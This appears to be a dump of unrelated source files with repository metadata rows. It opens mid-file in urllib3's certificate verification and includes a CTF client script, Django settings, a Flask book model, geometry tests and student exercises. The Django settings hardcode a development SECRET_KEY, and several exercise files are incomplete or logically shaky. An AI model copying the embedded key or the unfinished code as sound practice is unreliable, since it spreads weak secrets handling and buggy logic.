self.sock = conn
# Calls self._set_hostport(), so self.host is
# self._tunnel_host below.
self._tunnel()
# Mark this connection as not reusable
self.auto_open = 0
# Override the host with the one we're requesting data from.
hostname = self._tunnel_host
is_time_off = datetime.date.today() < RECENT_DATE
if is_time_off:
warnings.warn((
'System time is way off (before {0}). This will probably '
'lead to SSL verification errors').format(RECENT_DATE),
SystemTimeWarning
)
# Wrap socket using verification with the root certs in
# trusted_root_certs
self.sock = ssl_wrap_socket(conn, self.key_file, self.cert_file,
cert_reqs=resolved_cert_reqs,
ca_certs=self.ca_certs,
ca_cert_dir=self.ca_cert_dir,
server_hostname=hostname,
ssl_version=resolved_ssl_version)
if self.assert_fingerprint:
assert_fingerprint(self.sock.getpeercert(binary_form=True),
self.assert_fingerprint)
elif resolved_cert_reqs != ssl.CERT_NONE \
and self.assert_hostname is not False:
cert = self.sock.getpeercert()
if not cert.get('subjectAltName', ()):
warnings.warn((
'Certificate for {0} has no `subjectAltName`, falling back to check for a '
'`commonName` for now. This feature is being removed by major browsers and '
'deprecated by RFC 2818. (See https://github.com/shazow/urllib3/issues/497 '
'for details.)'.format(hostname)),
SubjectAltNameWarning
)
_match_hostname(cert, self.assert_hostname or hostname)
self.is_verified = (resolved_cert_reqs == ssl.CERT_REQUIRED or
self.assert_fingerprint is not None)
def _match_hostname(cert, asserted_hostname):
try:
match_hostname(cert, asserted_hostname)
except CertificateError as e:
log.error(
'Certificate did not match expected hostname: %s. '
'Certificate: %s', asserted_hostname, cert
)
# Add cert to exception and reraise so client code can inspect
# the cert when catching the exception, if they want to
e._peer_cert = cert
raise
if ssl:
# Make a copy for testing.
UnverifiedHTTPSConnection = HTTPSConnection
HTTPSConnection = VerifiedHTTPSConnection
else:
HTTPSConnection = DummyConnection
| [
"[email protected]"
] | |
433aa413dbbf3fa57c5763bd7eb0530e55be08f0 | 830465731dfda87b4141546262f20d74c29297bf | /Games/DagwCTF2020/TakeItBackNow/client0.py | 3e577c3492467502cc615738464b2bae91453420 | [] | no_license | jchen8tw-research/CTF | f559d7ca0e16a730335b11caeeae208c42e8bf17 | f49615c24437a9cc6a2c20d6b30cb5abf7a32b71 | refs/heads/master | 2023-03-17T12:29:08.630613 | 2021-03-23T06:31:26 | 2021-03-23T06:31:26 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 646 | py | # -*- coding: utf-8 -*-
"""
Created for Spring 2020 CTF
Cryptography 0
10 Points
Welcome to my sanity check. You'll find this to be fairly easy.
The oracle is found at umbccd.io:13370, and your methods are:
flg - returns the flag
tst - returns the message after the : in "tst:..."
@author: pleoxconfusa
"""
import socket
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address = ('crypto.ctf.umbccd.io', 13370)
sock.connect(server_address)
#available methods: flg, tst.
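# e.g. sending 'flg' instead of the 'tst:...' echo below returns the flag.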
msg = 'tst:hello'
sock.sendall(msg.encode())
data = sock.recv(1024)
print(data.decode())
sock.close() | [
"[email protected]"
] | |
b542e098a92e72342cb38640aacc06125c27de7f | 998610ed0b370c5beb73d908164d07f6f9a692ab | /tachovendo_proj/settings/base.py | 2eeb26e276275d69531b6b692436f73ad4a6f279 | [] | no_license | loogica/tachovendo_backend | d372f0032cc5ab02883c433cc2ed36467adf85c9 | 4333a55716df31897eeecb84ffa019456336e010 | refs/heads/master | 2016-09-06T08:06:07.003269 | 2013-06-04T01:03:36 | 2013-06-04T01:03:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,111 | py | # coding: utf-8
"""Common settings and globals."""
import os
from os.path import abspath, basename, dirname, join, normpath
from sys import argv, path
from unipath import Path
########## PATH CONFIGURATION
# Absolute filesystem path to the Django project directory:
DJANGO_ROOT = dirname(dirname(abspath(__file__)))
PROJECT_ROOT = Path(__file__).ancestor(3)
# Absolute filesystem path to the top-level project folder:
SITE_ROOT = dirname(DJANGO_ROOT)
# Site name:
SITE_NAME = basename(DJANGO_ROOT)
# Add our project to our pythonpath, this way we don't need to type our project
# name in our dotted import paths:
path.append(DJANGO_ROOT)
########## END PATH CONFIGURATION
########## DEBUG CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#debug
DEBUG = False
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-debug
TEMPLATE_DEBUG = DEBUG
########## END DEBUG CONFIGURATION
########## MANAGER CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#admins
ADMINS = (
('you', '[email protected]'),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#managers
MANAGERS = ADMINS
########## END MANAGER CONFIGURATION
########## DATABASE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': '',
'USER': '',
'PASSWORD': '',
'HOST': '',
'PORT': '',
}
}
########## END DATABASE CONFIGURATION
########## GENERAL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#time-zone
TIME_ZONE = 'America/Sao_Paulo'
# See: https://docs.djangoproject.com/en/dev/ref/settings/#language-code
LANGUAGE_CODE = 'pt-br'
gettext = lambda s: s
LANGUAGES = (
('pt', gettext('Português')),
('en', gettext('English')),
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#site-id
SITE_ID = 1
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-i18n
USE_I18N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-l10n
USE_L10N = True
# See: https://docs.djangoproject.com/en/dev/ref/settings/#use-tz
USE_TZ = True
LOCALE_PATHS = normpath(join(DJANGO_ROOT, 'locale'))
########## END GENERAL CONFIGURATION
########## MEDIA CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-root
MEDIA_ROOT = normpath(join(DJANGO_ROOT, 'media'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#media-url
MEDIA_URL = '/media/'
########## END MEDIA CONFIGURATION
########## STATIC FILE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-root
STATIC_ROOT = normpath(join(DJANGO_ROOT, 'assets'))
# See: https://docs.djangoproject.com/en/dev/ref/settings/#static-url
STATIC_URL = '/static/'
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#std:setting-STATICFILES_DIRS
STATICFILES_DIRS = (
normpath(join(DJANGO_ROOT, 'static')),
)
# See: https://docs.djangoproject.com/en/dev/ref/contrib/staticfiles/#staticfiles-finders
STATICFILES_FINDERS = (
'django.contrib.staticfiles.finders.FileSystemFinder',
'django.contrib.staticfiles.finders.AppDirectoriesFinder',
)
########## END STATIC FILE CONFIGURATION
########## SECRET CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#secret-key
# Note: This key only used for development and testing.
SECRET_KEY = r"$&jkf@shv+tec-uz_t5qz0u7nxrp%2b4v!9ym3rqd!=mmy-7+*"
########## END SECRET CONFIGURATION
########## FIXTURE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#std:setting-FIXTURE_DIRS
FIXTURE_DIRS = (
normpath(join(SITE_ROOT, 'fixtures')),
)
########## END FIXTURE CONFIGURATION
########## TEMPLATE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-context-processors
TEMPLATE_CONTEXT_PROCESSORS = (
'django.contrib.auth.context_processors.auth',
'django.core.context_processors.debug',
'django.core.context_processors.i18n',
'django.core.context_processors.media',
'django.core.context_processors.static',
'django.core.context_processors.tz',
'django.contrib.messages.context_processors.messages',
'django.core.context_processors.request',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-loaders
TEMPLATE_LOADERS = (
'django.template.loaders.filesystem.Loader',
'django.template.loaders.app_directories.Loader',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#template-dirs
TEMPLATE_DIRS = (
normpath(join(DJANGO_ROOT, 'templates')),
)
########## END TEMPLATE CONFIGURATION
########## MIDDLEWARE CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#middleware-classes
MIDDLEWARE_CLASSES = (
# Default Django middleware.
'django.middleware.common.CommonMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.locale.LocaleMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
)
########## END MIDDLEWARE CONFIGURATION
########## URL CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#root-urlconf
ROOT_URLCONF = '%s.urls' % SITE_NAME
########## END URL CONFIGURATION
# Auth views Config
LOGIN_URL = "/login"
LOGIN_REDIRECT_URL = "/"
# End
########## APP CONFIGURATION
DJANGO_APPS = (
# Default Django apps:
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.sites',
'django.contrib.messages',
'django.contrib.staticfiles',
# Useful template tags:
# 'django.contrib.humanize',
'django.contrib.admin',
)
THIRD_PARTY_APPS = (
# Database migration helpers:
'south',
'widget_tweaks',
)
# Apps specific for this project go here.
LOCAL_APPS = (
'tachovendo',
)
# See: https://docs.djangoproject.com/en/dev/ref/settings/#installed-apps
INSTALLED_APPS = DJANGO_APPS + THIRD_PARTY_APPS + LOCAL_APPS
########## END APP CONFIGURATION
########## RIOAPPS KEY CONFIG
APP_ID = os.environ.get('RIOAPPS_APP_ID')
APP_SECRET = os.environ.get('RIOAPPS_APP_SECRET')
########## END RIOAPPS KEYS CONFIG
########## LOGGING CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#logging
# A sample logging configuration. The only tangible logging
# performed by this configuration is to send an email to
# the site admins on every HTTP 500 error when DEBUG=False.
# See http://docs.djangoproject.com/en/dev/topics/logging for
# more details on how to customize your logging configuration.
LOGGING = {
'version': 1,
'disable_existing_loggers': False,
'formatters': {
'verbose': {
'format': '%(levelname)s %(asctime)s %(module)s %(process)d %(thread)d %(message)s'
},
'simple': {
'format': '%(levelname)s %(message)s'
},
},
'filters': {
'require_debug_false': {
'()': 'django.utils.log.RequireDebugFalse'
}
},
'handlers': {
'null': {
'level': 'DEBUG',
'class': 'django.utils.log.NullHandler',
},
'console':{
'level': 'DEBUG',
'class': 'logging.StreamHandler',
'formatter': 'simple'
},
'mail_admins': {
'level': 'ERROR',
'filters': ['require_debug_false'],
'class': 'django.utils.log.AdminEmailHandler'
}
},
'loggers': {
'django.request': {
'handlers': ['mail_admins'],
'level': 'ERROR',
'propagate': True,
},
'events.views': {
'handlers': ['console'],
'level': 'INFO',
'propagate': True,
},
}
}
########## END LOGGING CONFIGURATION
########## WSGI CONFIGURATION
# See: https://docs.djangoproject.com/en/dev/ref/settings/#wsgi-application
WSGI_APPLICATION = 'wsgi.application'
########## END WSGI CONFIGURATION
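# A per-environment module would typically extend this base (sketch only;
# no such file ships in this snippet):
#   # settings/local.py
#   from .base import *  # noqa
#   DEBUG = True
#   TEMPLATE_DEBUG = DEBUG
#   DATABASES['default']['NAME'] = 'tachovendo_dev'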
| [
"[email protected]"
] | |
2b17d640e22b95cc5a61021381c03af14f83aee7 | a30362e51cb3291daf26d0c62e56c42caeec837f | /python/acmicpc/unsolved/8984.py | e9fc6b9f6e862ee51d73a36e02a12d6bc484c6b5 | [] | no_license | TERADA-DANTE/algorithm | 03bf52764c6fcdb93d7c8a0ed7a672834f488412 | 20bdfa1a5a6b9c378e588b17073e77a0126f7339 | refs/heads/master | 2023-04-14T21:40:11.250022 | 2023-04-12T13:00:37 | 2023-04-12T13:00:37 | 288,335,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 210 | py | import sys
input = sys.stdin.readline
n, l = list(map(int, input().split()))
lines = [list(map(int, input().split())) for _ in range(n)]
def solution(n, l, lines):
return n, l, lines
print(n, l, lines)
| [
"[email protected]"
] | |
3f14475e0c2863c12b7447c7a82f14ad759b824e | a140fe192fd643ce556fa34bf2f84ddbdb97f091 | /.history/class맴버변수_20200708170750.py | 62351d8c9312e58d87ab4c22a5685c88c76c9c41 | [] | no_license | sangha0719/py-practice | 826f13cb422ef43992a69f822b9f04c2cb6d4815 | 6d71ce64bf91cc3bccee81378577d84ba9d9c121 | refs/heads/master | 2023-03-13T04:40:55.883279 | 2021-02-25T12:02:04 | 2021-02-25T12:02:04 | 342,230,484 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 374 | py | class Unit:
def __init__(self, name, hp, damage):
self.name = name
self.hp = hp
self.damage = damage
print("{0} 유닛이 생성 되었습니다.".format(self.name))
print("체력 {0}, 공격력 {1}".format(self.hp, self.damage))
# Wraith: air unit, aircraft, cloaking (invisible to the opponent)
wraith = Unit("wraith", 80, 5)  # illustrative stats so the constructor call is complete
| [
"[email protected]"
] | |
76c6674b3a2fb4f35bd3276d78443a663070b14f | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2950/60632/269982.py | e99e3be7a8277b32c3e022c23301da28661ec71a | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 273 | py | s = list(input())
if len(s) % 2 == 1:
print(-1)
else:
result = 0
for i in range(len(s)):
if s[:i].count('5') > s[:i].count('2'):
result = -1
break
    if result != -1:
        # count over the whole string and keep -1 once an invalid prefix was found
        result = max(s.count('2') - s.count('5'), result)
print(result)
| [
"[email protected]"
] | |
54a8883bb18ba783ca7d90de1608b104223d1c3f | 30dbb8c5a5cce9dfea904924f00a1451abd0c88b | /이분탐색/입국심사.py | d1b435138bd0d7498ccb48efc79bedafab3961ee | [] | no_license | gksrb2656/AlgoPractice | 7eac983509de4c5f047a880902253e477f4ca27c | 5285479625429b8ef46888c8611dc132924833b7 | refs/heads/master | 2020-12-22T17:20:33.677147 | 2020-09-22T16:05:53 | 2020-09-22T16:05:53 | 236,872,750 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 428 | py | def solution(n, times):
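    # Parametric binary search on the answer: a total time `mid` is feasible
    # when sum(mid // t for t in times) >= n, so the loop hunts the smallest
    # feasible value in [1, max(times) * n]. For the sample call at the
    # bottom (n=6, times=[7, 10]) that minimum is 28.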
l = 1
r = max(times)*n
answer = 0
while l <= r:
mid = (l + r) // 2
flag = 0
people = 0
for t in times:
people += mid // t
if people >= n:
flag = 1
answer = mid
break
if flag:
r = mid - 1
else:
l = mid + 1
return answer
print(solution(6, [7, 10])) | [
"[email protected]"
] | |
149a39da8051edd413bd0e53d557532e042ebf01 | fc6f0806292263bbfb2055587468df68ab6a950e | /tests/test_mixins.py | dad5938477e9c873a7c71c6b6f343aff1a6fd7b9 | [
"Apache-2.0"
] | permissive | WithPrecedent/sourdough | 8c0a5cff14c2257162fd1d66bf03a5a53f6a9571 | e42f81e5b27b067e13ff17338300e56c23ae4cad | refs/heads/master | 2023-03-03T16:23:10.857530 | 2021-02-10T04:49:57 | 2021-02-10T04:49:57 | 261,512,460 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,898 | py | """
test_mixins: unit tests for Component mixins
Corey Rayburn Yung <[email protected]>
Copyright 2020-2021, Corey Rayburn Yung
License: Apache-2.0 (https://www.apache.org/licenses/LICENSE-2.0)
"""
import dataclasses
import sourdough
@dataclasses.dataclass
class AComponent(
sourdough.Bunch,
sourdough.Registry,
sourdough.quirks.Element):
pass
@dataclasses.dataclass
class OtherComponent(AComponent):
pass
@dataclasses.dataclass
class AnotherComponent(sourdough.Options, OtherComponent):
options = sourdough.Catalog(contents = {
'base': AComponent(),
'other': OtherComponent()})
@dataclasses.dataclass
class ProxiedComponent(sourdough.Proxy, OtherComponent):
def __post_init__(self):
super().__post_init__()
self._hidden_attribute = 'value'
self.proxify(proxy = 'new_property', attribute = '_hidden_attribute')
def test_mixins():
# Tests Component, Registry, and Bunch
a_component = AComponent()
other_component = OtherComponent()
assert 'other_component' in AComponent.store
assert 'other_component' in a_component.store
an_instance = a_component.instance(key = 'other_component', name = 'test')
assert an_instance.name == 'test'
another_instance = a_component.borrow(key = 'other_component')
assert another_instance.name == 'other_component'
# Tests Options
another_component = AnotherComponent()
base_instance = another_component.select(key = 'base')
other_instance = another_component.select(key = 'other')
assert other_instance.name == 'other_component'
# Tests Proxy
# proxied_component = ProxiedComponent()
# assert proxied_component.new_property == 'value'
return
if __name__ == '__main__':
test_mixins() | [
"[email protected]"
] | |
20878697ebaf854f56e4a45f312b2032fba93a2c | ef8c5c55b6ec3971adff9afe2db1f76556b87082 | /code_examples/PyKIM/util/convert_coord/test_cart_cs.py | 73f53cd89f0df756db61dc64bfb03fbd2688b823 | [] | no_license | wbkifun/my_stuff | 7007efc94b678234097abf0df9babfbd79dcf0ff | 0b5ad5d4d103fd05989b514bca0d5114691f8ff7 | refs/heads/master | 2020-12-10T22:40:28.532993 | 2017-11-15T11:39:41 | 2017-11-15T11:39:41 | 5,178,225 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,608 | py | import numpy as np
from numpy import pi, sin, cos, tan, sqrt
from numpy.random import rand, randint
from numpy.testing import assert_equal as equal
from numpy.testing import assert_array_equal as a_equal
from numpy.testing import assert_array_almost_equal as aa_equal
from nose.tools import raises, ok_
import sys
from os.path import abspath, dirname
current_dpath = dirname(abspath(__file__))
sys.path.append(current_dpath)
def test_xyp2xyz():
'''
xyp2xyz(): center of panel, at panel border
'''
from cart_cs import xyp2xyz
R = 1
a = R/sqrt(3)
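    # Gnomonic cubed-sphere convention assumed by these tests: a = R/sqrt(3)
    # is the half edge of the cube inscribed in the sphere, and a point at
    # angle alpha from a panel center lands at local coordinate x = a*tan(alpha).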
#------------------------------------------------
# center of panel
#------------------------------------------------
x, y, panel = 0, 0, 1
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (1,0,0))
x, y, panel = 0, 0, 2
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,1,0))
x, y, panel = 0, 0, 3
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-1,0,0))
x, y, panel = 0, 0, 4
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,-1,0))
x, y, panel = 0, 0, 5
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,0,-1))
x, y, panel = 0, 0, 6
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0,0,1))
#------------------------------------------------
# at the panel border
#------------------------------------------------
alpha = pi/4
x, y, panel = a*tan(alpha), 0, 1
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (R*cos(alpha), R*sin(alpha), 0))
x, y, panel = a*tan(alpha), 0, 2
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-R*sin(alpha), R*cos(alpha), 0))
x, y, panel = 0, -a*tan(alpha), 2
(X, Y, Z) = xyp2xyz(x, y, panel)
aa_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)), 15)
x, y, panel = a*tan(alpha), 0, 3
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (-R*cos(alpha), -R*sin(alpha), 0))
x, y, panel = a*tan(alpha), 0, 4
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (R*sin(alpha), -R*cos(alpha), 0))
x, y, panel = a*tan(alpha), 0, 5
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0, R*sin(alpha), -R*cos(alpha)))
x, y, panel = a*tan(alpha), 0, 6
(X, Y, Z) = xyp2xyz(x, y, panel)
a_equal((X,Y,Z), (0, R*sin(alpha), R*cos(alpha)))
def test_xyz2xyp():
'''
xyz2xyp(): center of panel, at panel border
'''
from cart_cs import xyz2xyp
R = 1
a = R/sqrt(3)
#------------------------------------------------
# center of panel
#------------------------------------------------
xyp_dict = xyz2xyp(1, 0, 0)
a_equal(xyp_dict, {1:(0.0,0)})
xyp_dict = xyz2xyp(0, 1, 0)
a_equal(xyp_dict, {2:(0,0)})
xyp_dict = xyz2xyp(-1, 0, 0)
a_equal(xyp_dict, {3:(0,0)})
xyp_dict = xyz2xyp(0, -1, 0)
a_equal(xyp_dict, {4:(0,0)})
xyp_dict = xyz2xyp(0, 0, -1)
a_equal(xyp_dict, {5:(0,0)})
xyp_dict = xyz2xyp(0, 0, 1)
a_equal(xyp_dict, {6:(0,0)})
#------------------------------------------------
# at the panel border
#------------------------------------------------
alpha = pi/4
at = a*tan(alpha)
xyp_dict = xyz2xyp(R*cos(alpha), R*sin(alpha), 0)
a_equal(list(xyp_dict.keys()), [1,2])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(-R*sin(alpha), R*cos(alpha), 0)
a_equal(list(xyp_dict.keys()), [2,3])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(-R*cos(alpha), -R*sin(alpha), 0)
a_equal(list(xyp_dict.keys()), [3,4])
aa_equal(list(xyp_dict.values()), [(at,0), (-at,0)], 15)
xyp_dict = xyz2xyp(R*sin(alpha), -R*cos(alpha), 0)
a_equal(list(xyp_dict.keys()), [1,4])
aa_equal(list(xyp_dict.values()), [(-at,0), (at,0)], 15)
xyp_dict = xyz2xyp(0, R*sin(alpha), -R*cos(alpha))
a_equal(list(xyp_dict.keys()), [2,5])
aa_equal(list(xyp_dict.values()), [(0,-at), (at,0)], 15)
xyp_dict = xyz2xyp(0, R*sin(alpha), R*cos(alpha))
a_equal(list(xyp_dict.keys()), [2,6])
aa_equal(list(xyp_dict.values()), [(0,at), (at,0)], 15)
def test_xyp2xyz_xyz2xyp():
'''
xyp2xyz() -> xyz2xyp() : check consistency, repeat 1000 times
'''
from cart_cs import xyp2xyz, xyz2xyp
N = 1000
R = 1
a = R/sqrt(3)
for i in range(N):
panel = randint(1,7)
alpha, beta = (pi/2)*rand(2) - pi/4
x, y = a*tan(alpha), a*tan(beta)
(X, Y, Z) = xyp2xyz(x, y, panel)
xyp_dict = xyz2xyp(X,Y,Z)
aa_equal((x,y), xyp_dict[panel], 15)
| [
"[email protected]"
] | |
7ba4723843b10f4bdde50acfefd5f04d1227d875 | 4344f7d6b3c26e8cb9c666ca0a1dc81d5d484fca | /4-auth/bookshelf/model_cloudsql.py | 5ceac779fc83be92f4bf47d5d8bd2c1317916370 | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | dpebot/getting-started-python | 5beec5a68738ae47ed4bb642a7f4a119052ee6b6 | 07ce28b40c9be8555cb8575b83d7ba836b6483f2 | refs/heads/master | 2020-12-26T04:38:09.399296 | 2016-08-03T18:16:30 | 2016-08-03T18:16:30 | 65,573,255 | 4 | 3 | null | 2016-08-12T17:59:13 | 2016-08-12T17:59:13 | null | UTF-8 | Python | false | false | 3,043 | py | # Copyright 2015 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from flask import Flask
from flask.ext.sqlalchemy import SQLAlchemy
builtin_list = list  # keep a handle on the builtin; a module-level list() function below shadows it
db = SQLAlchemy()
def init_app(app):
db.init_app(app)
def from_sql(row):
"""Translates a SQLAlchemy model instance into a dictionary"""
data = row.__dict__.copy()
data['id'] = row.id
data.pop('_sa_instance_state')
return data
class Book(db.Model):
__tablename__ = 'books'
id = db.Column(db.Integer, primary_key=True)
title = db.Column(db.String(255))
author = db.Column(db.String(255))
publishedDate = db.Column(db.String(255))
imageUrl = db.Column(db.String(255))
description = db.Column(db.String(255))
createdBy = db.Column(db.String(255))
createdById = db.Column(db.String(255))
def __repr__(self):
return "<Book(title='%s', author=%s)" % (self.title, self.author)
def list(limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
query = (Book.query
.order_by(Book.title)
.limit(limit)
.offset(cursor))
books = builtin_list(map(from_sql, query.all()))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
# [START list_by_user]
def list_by_user(user_id, limit=10, cursor=None):
cursor = int(cursor) if cursor else 0
query = (Book.query
.filter_by(createdById=user_id)
.order_by(Book.title)
.limit(limit)
.offset(cursor))
books = builtin_list(map(from_sql, query.all()))
next_page = cursor + limit if len(books) == limit else None
return (books, next_page)
# [END list_by_user]
def read(id):
result = Book.query.get(id)
if not result:
return None
return from_sql(result)
def create(data):
book = Book(**data)
db.session.add(book)
db.session.commit()
return from_sql(book)
def update(data, id):
book = Book.query.get(id)
for k, v in data.items():
setattr(book, k, v)
db.session.commit()
return from_sql(book)
def delete(id):
Book.query.filter_by(id=id).delete()
db.session.commit()
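# CRUD usage sketch (hypothetical data; requires an active Flask app context):
#   with app.app_context():
#       book = create({'title': 'Example', 'author': 'A. Writer'})
#       book = update({'title': 'Example, 2nd ed.'}, book['id'])
#       delete(book['id'])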
def _create_database():
"""
If this script is run directly, create all the tables necessary to run the
application.
"""
app = Flask(__name__)
app.config.from_pyfile('../config.py')
init_app(app)
with app.app_context():
db.create_all()
print("All tables created")
if __name__ == '__main__':
_create_database()
| [
"[email protected]"
] | |
4bf42f64d15e50c0c51bbc1ad46db6a070cd95e2 | d5d2ddfb2f6a4d025d0d323d343550d11990674f | /model/scripts/main_mutual_information_MSN.py | d3113bb158c04dbcb81800724706ff0a482a1844 | [] | no_license | mickelindahl/dynsyn | 5d710fa67d31f344c56c3b853b9d78af1f297fbf | c05a74c0f7dd977742ce55220d12270c03147e0f | refs/heads/master | 2021-01-01T05:37:57.452690 | 2015-02-23T10:16:44 | 2015-02-23T10:16:44 | 30,537,438 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 6,161 | py | import numpy
import pylab
import os
import sys
import time as ttime
# Get directory where model and code resides
model_dir= '/'.join(os.getcwd().split('/')[0:-1])
code_dir= '/'.join(os.getcwd().split('/')[0:-2])
# Add model, code and current directories to python path
sys.path.append(os.getcwd())
sys.path.append(model_dir)
sys.path.append(code_dir+'/nest_toolbox')
from simulation_utils import simulate_MSN
from src import misc
OUTPUT_PATH = os.getcwd()+'/output/' + sys.argv[0].split('/')[-1].split('.')[0]
RUN=True
# 48 minuter 200x10x10
HZS=numpy.linspace(5,50,10)
N_MSNS=numpy.linspace(5,50,10)
t=ttime.time()
save_result_at=OUTPUT_PATH+'/main_mutual_information_raw_data.pkl'
if RUN is False:
count_dic={}
for i_syn, syn in enumerate(['MSN_SNR_gaba_s_min', 'MSN_SNR_gaba_s_mid', 'MSN_SNR_gaba_s_max',
'MSN_SNR_gaba_p1']):
count_dic[i_syn]={}
for hz in numpy.linspace(5,50,10):
count_dic[i_syn][hz]={}
for N_MSN in numpy.linspace(5,50,10):
count_dic[i_syn][hz][N_MSN]=[]
for i in range(200):
c, time= simulate_MSN(int(N_MSN), ['SNR_izh'], [syn],
sim_time=1000, burst_onset=700, burst_offset=1000,
burst_rate=hz, threads=1)
count_dic[i_syn][hz][N_MSN].extend(c)
count_dic[i_syn][hz][N_MSN]=numpy.array(count_dic[i_syn][hz][N_MSN])
misc.pickle_save([count_dic, time],save_result_at)
else:
#count_dic, time= misc.pickle_load(save_result_at)
pass
save_result_at=OUTPUT_PATH+'/main_mutual_information_prob.pkl'
if RUN is False:
c_prob=[]
c_sum=[]
for i in sorted(list(count_dic.keys())):
c_prob.append([])
c_sum.append([])
for j, hz in enumerate(sorted(list(count_dic[i].keys()))):
c_prob[i].append([])
c_sum[i].append([])
for N in sorted(list(count_dic[i][hz].keys())):
c=count_dic[i][hz][N][2::3,:] # Pick out results for SNr
c_conv=misc.convolve(c,bin_extent=100, kernel_type='rectangle')
c_prob[i][j].append(numpy.sum(c_conv<1,axis=0)/float(c_conv.shape[0]))
c_sum[i][j].append(numpy.sum(c,axis=0))
c_prob=numpy.array(c_prob)
c_sum=numpy.array(c_sum)
misc.pickle_save([c_prob, c_sum, time],save_result_at)
else:
c_prob, c_sum, time= misc.pickle_load(save_result_at)
from numpy import *
import pylab as p
#import matplotlib.axes3d as p3
import mpl_toolkits.mplot3d.axes3d as p3
from matplotlib import cm
#ax2=pylab.subplot(111)
for i in range(c_sum.shape[0]):
#
x=[]
y=[]
z=[]
#fig = pylab.figure()
#ax1=pylab.subplot(111)
for j in range(c_sum.shape[1]):
x.append([])
y.append([])
z.append([])
for k in range(c_sum.shape[2]):
x[j].append(HZS[j])
y[j].append(N_MSNS[k])
z[j].append(c_sum[i,j,k,770])
#z[j].append(c_prob[i,j,k,770])
if (i==1) and (j==1) and (k==9):
fig = pylab.figure()
ax=pylab.subplot(111)
ax.plot(time, c_sum[i,j,k,:])
ax.plot(time, misc.convolve(c_sum[i,j,k,:], bin_extent=100, kernel_type='rectangle', single=True).transpose())
pylab.show()
ax.set_xlabel('Spike count')
#ax1.plot(c_sum[i,j,k,:])
#ax1.plot(c_prob[i,j,k,:])
x=numpy.array(x)
y=numpy.array(y)
z=numpy.array(z)
# fig = pylab.figure()
# ax = p3.Axes3D(fig)
# ax.plot_surface(x, y, z, rstride=1, cstride=1, cmap=cm.jet)
# ax.view_init(50, 135)
#
fig = pylab.figure()
ax=pylab.subplot(111)
for k in range(c_sum.shape[1]):
ax.plot(x[:,k],z[:,k])
ax.set_xlabel('Firing rate (spikes/s)')
